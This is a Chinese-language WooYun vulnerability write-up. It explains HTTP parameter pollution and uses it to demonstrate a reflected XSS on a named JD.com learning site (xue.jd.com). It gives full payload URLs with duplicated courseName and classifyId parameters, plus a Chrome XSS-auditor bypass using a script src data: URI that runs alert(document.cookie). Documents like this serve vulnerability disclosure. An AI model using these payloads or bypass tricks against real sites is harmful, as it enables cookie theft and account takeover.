WooYun.org

0x00 关于HTTP parameter pollution（以下简称HPP）
这部分内容在https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf上说的很详细了。
简单的说，就是http://www.test.com/?q=xss1&q=xss2，不同的WEB服务器处理的方式不一样，个人感觉http://blog.csdn.net/eatmilkboy/article/details/6761407中google和yahoo的例子已经将HPP的原理讲得很清楚了。
个人认为HPP可以有以下的一些作用：
1.绕过WAF
2.SQL注入
3.XSS
4.其它（例如上文http://blog.csdn.net/eatmilkboy/article/details/6761407中提到的刷票）
0x01 XSS

http://xue.jd.com/ondemandCourse/queryOndemandCoursePage.action?classifyId=&courseLable=%25E6%258E%25A8%25E5%25B9%25BF&courseName=123&courseName=1234&flag=1

当URL中有两个courseName（courseName=123 courseName=1234）时，回显如图所示：

可以看出，这里是一个HPP的点。同理，这个URL中的classifyId参数也存在HPP，也可以构造反射型XSS，下文就拿courseName举例，但是厂商修复的时候别漏了classifyId这个参数。
当我们把第一个courseName参数中加上>后，发现直接跳转到了xue.jd.com,可以明显地看出有过滤。
但是当我们在第二个courseName参数后加上>后，并没有跳转发生，所以这里可以绕过。
尝试SQL注入无果后再次尝试XSS。

http://xue.jd.com/ondemandCourse/queryOndemandCoursePage.action?classifyId=&courseLable=%25E6%258E%25A8%25E5%25B9%25BF&courseName=123&courseName=12%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3Ca%20herf=%22&flag=1

很不幸，被chrome的filter拦住了。

0x02 绕过chrome的filter
搜索wooyun以往的绕过filter的例子，找到了
WooYun: bilibili某子站存在反射型XSS漏洞可成功获取用户权限（XSS auditor bypass技巧）
里面说的已经很清楚了，我就不赘述了。
成功构造

http://xue.jd.com/ondemandCourse/queryOndemandCoursePage.action?flag=1&classifyId=1&classifyId=1%22%3E%3Cscript/src=data:,alert(document.cookie);%26sol;%26sol;&courseName=e&courseName=%3C/script%3E%3Ca%20herf=%22&sortField=publish_time&order=asc

由于只是证明问题，故只构造alert(document.cookie)，没有进一步获取cookie了。